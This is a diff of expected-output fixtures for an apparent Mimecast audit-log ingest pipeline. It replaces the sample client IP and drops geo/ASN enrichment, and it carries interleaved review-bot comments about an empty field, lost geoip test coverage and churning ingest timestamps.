- "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60\",\"auditType\":\"Logon Requires Challenge\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T17:17:26+0000\",\"eventInfo\":\"Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 8.8.8.8, Application: Administration Console, Method: Office 365, 2FA: TOTP\",\"category\":\"authentication_logs\"}",
+ "ingested": "2021-12-09T15:16:03.637479400Z",
+ "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60\",\"auditType\":\"Logon Requires Challenge\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T17:17:26+0000\",\"eventInfo\":\"Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP\",\"category\":\"authentication_logs\"}",
 "id": "eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60",
 "created": "2021-10-11T07:17:26.000Z"
 },
@@ -217,7 +157,7 @@
 "mimecast": {
 "application": "Administration Console, Method: Office 365, 2FA: TOTP",
 "category": "authentication_logs",
- "eventInfo": "Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 8.8.8.8, Application: Administration Console, Method: Office 365, 2FA: TOTP"
+ "eventInfo": "Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP"
 }
 },
 {
@@ -231,31 +171,16 @@
 "johndoe@example.com"
 ],
 "ip": [
- "8.8.8.8"
+ "67.43.156.15"
 ]
 },
 "client": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "event": {
 "action": "user-logged-on",
- "ingested": "2021-11-25T11:34:08.372332600Z",
- "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI\", \"auditType\": \"User Logged On\", \"user\": \"johndoe@example.com\", \"eventTime\": \"2021-10-11T16:03:38+0000\", \"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 8.8.8.8, Application: Administration Console, Method: Cloud\", \"category\": \"authentication_logs\"}",
+ "ingested": "2021-12-09T15:16:03.637485300Z",
+ "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI\", \"auditType\": \"User Logged On\", \"user\": \"johndoe@example.com\", \"eventTime\": \"2021-10-11T16:03:38+0000\", \"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud\", \"category\": \"authentication_logs\"}",
 "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI",
 "created": "2021-10-11T06:03:38.000Z"
 },
@@ -270,7 +195,7 @@
 "mimecast": {
 "application": "Administration Console, Method: Cloud",
 "category": "authentication_logs",
- "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 8.8.8.8, Application: Administration Console, Method: Cloud"
+ "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud"
 }
 },
 {
@@ -284,31 +209,16 @@ "johdoe@example.local" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-11-25T11:34:08.372333600Z", - "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu\", \"auditType\": \"Mimecast Support Login\", \"user\": \"johdoe@example.local\", \"eventTime\": \"2021-10-11T15:39:17+0000\", \"eventInfo\": \"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 8.8.8.8 Application: Administration Console\", \"category\": \"mimecast_access_logs\"}", + "ingested": "2021-12-09T15:16:03.637491300Z", + "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu\", \"auditType\": \"Mimecast Support Login\", \"user\": \"johdoe@example.local\", \"eventTime\": \"2021-10-11T15:39:17+0000\", \"eventInfo\": \"Action Performed - johdoe@example.local logged into this account. 
by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console\", \"category\": \"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "created": "2021-10-11T16:39:17.000Z" }, @@ -323,7 +233,7 @@ "mimecast": { "application": "Administration Console", "category": "mimecast_access_logs", - "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { 
@@ -337,31 +247,16 @@ "johdoe@example.local" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-11-25T11:34:08.372334500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK\",\"auditType\":\"Mimecast Support Login\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-19T11:46:40+0000\",\"eventInfo\":\"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 8.8.8.8 Application: Administration Console\",\"category\":\"mimecast_access_logs\"}", + "ingested": "2021-12-09T15:16:03.637497300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK\",\"auditType\":\"Mimecast Support Login\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-19T11:46:40+0000\",\"eventInfo\":\"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK", "created": "2021-10-19T12:46:40.000Z" }, 
@@ -376,7 +271,7 @@ "mimecast": { "application": "Administration Console", "category": "mimecast_access_logs", - "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { @@ -390,31 +285,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "message-action", - "ingested": "2021-11-25T11:34:08.372335500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8\",\"auditType\":\"Message Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:36:01+0000\",\"eventInfo\":\"Viewed Message - Source: Search, 
From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637503100Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8\",\"auditType\":\"Message Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:36:01+0000\",\"eventInfo\":\"Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8", "created": "2021-10-11T15:36:01.000Z" }, @@ -438,7 +318,7 @@ ], "mimecast": { "name": {}, - "eventInfo": "Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 8.8.8.8, Application: mimecast-case-review", + "eventInfo": "Viewed Message - Source: Search, 
From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review", "application": "mimecast-case-review", "category": "case_review_logs" } 
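Review bot: The regenerated `mimecast` object in this hunk keeps `"name": {}`, an empty container with no members, which typically means a processor created the parent object for a value that was never set; the fixture now pins that empty object as the correct result. The enclosing object starts before the hunk, so the field's origin is not visible here. If `mimecast.name` is meant to carry something for message-action events the expectation should show it, otherwise the processor that creates it should be conditioned so the empty object is not emitted.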
@@ -454,31 +334,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "search-action", - "ingested": "2021-11-25T11:34:08.372336400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw\",\"auditType\":\"Search Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:35:53+0000\",\"eventInfo\":\"Executed Search - Source: Search, Search Criteria: {\\\"keywords\\\":\\\"test\\\",\\\"mailboxes\\\":[\\\"johndoe@example.com\\\"],\\\"route\\\":\\\"ALL\\\",\\\"start\\\":\\\"2021-04-11T16:34:45+0100\\\",\\\"end\\\":\\\"2021-10-11T16:34:45+0100\\\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637509100Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw\",\"auditType\":\"Search Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:35:53+0000\",\"eventInfo\":\"Executed Search - Source: Search, Search Criteria: {\\\"keywords\\\":\\\"test\\\",\\\"mailboxes\\\":[\\\"johndoe@example.com\\\"],\\\"route\\\":\\\"ALL\\\",\\\"start\\\":\\\"2021-04-11T16:34:45+0100\\\",\\\"end\\\":\\\"2021-10-11T16:34:45+0100\\\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": 
"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw", "created": "2021-10-11T15:35:53.000Z" }, @@ -493,7 +358,7 @@ "mimecast": { "application": "mimecast-case-review", "category": "case_review_logs", - "eventInfo": "Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 8.8.8.8, Application: mimecast-case-review" + "eventInfo": "Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review" } }, { 
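Review bot: The rewritten expected documents for 67.43.156.15 drop client.geo and client.as entirely, whereas the 8.8.8.8 versions carried geo and ASN enrichment, so after this change the fixture no longer exercises the pipeline's geoip/asn enrichment path for client.ip — the same loss appears in the hunks at -507, -590, -643, -697, -750, -808, -861, -913, -994, -1048 and -1101. If the move to the supported test address was meant to keep that coverage, it is worth confirming whether the pipeline test GeoIP database resolves 67.43.156.15 and, if not, choosing an address from the supported subset that it does resolve so that the geo and as fields keep a regression check. Separately, every hunk also rewrites event.ingested, which is a run-time value; if the package's pipeline test config does not already list it under dynamic_fields, declaring it there would stop fixture regeneration from churning these lines. The file header of this expected-output file is outside the visible range, so the file path and its test config are not confirmed here.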
@@ -507,31 +372,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "logon-authentication-failed", - "ingested": "2021-11-25T11:34:08.372337400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T14:46:10+0000\",\"eventInfo\":\"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 8.8.8.8 application : LFS\",\"category\":\"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637515300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T14:46:10+0000\",\"eventInfo\":\"Creating the auditLog entry for failed authentication, emailAddress 
:com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M" }, "user": { @@ -543,7 +393,7 @@ "preserve_original_event" ], "mimecast": { - "eventInfo": "Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 8.8.8.8 application : LFS", + "eventInfo": "Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS", "application": "LFS", "category": "authentication_logs", "email": { 
@@ -564,7 +414,7 @@ }, "event": { "action": "completed-directory-sync", - "ingested": "2021-11-25T11:34:08.372338400Z", + "ingested": "2021-12-09T15:16:03.637519200Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys\",\"auditType\":\"Completed Directory Sync\",\"user\":\"\",\"eventTime\":\"2021-10-11T13:21:06+0000\",\"eventInfo\":\"No changes found.\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys" }, 
@@ -590,31 +440,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "case-action", - "ingested": "2021-11-25T11:34:08.372339500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo\",\"auditType\":\"Case Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T09:19:53+0000\",\"eventInfo\":\"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637524500Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo\",\"auditType\":\"Case Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T09:19:53+0000\",\"eventInfo\":\"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo", "created": "2021-10-12T09:19:53.000Z" }, 
@@ -629,7 +464,7 @@
 "mimecast": {
 "application": "mimecast-case-review",
 "category": "case_review_logs",
- "eventInfo": "Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 8.8.8.8, Application: mimecast-case-review"
+ "eventInfo": "Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review"
 }
 },
 {
@@ -643,32 +478,17 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "reason": "Reason: Wrong password", "action": "logon-authentication-failed", - "ingested": "2021-11-25T11:34:08.372340500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:55+0000\",\"eventInfo\":\"Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 8.8.8.8, Application: mimecast-moa, Method: Office 365, Reason: Wrong password\",\"category\":\"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637543Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:55+0000\",\"eventInfo\":\"Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg", "created": "2021-10-11T22:47:55.000Z" }, 
@@ -683,7 +503,7 @@
 "mimecast": {
 "application": "mimecast-moa",
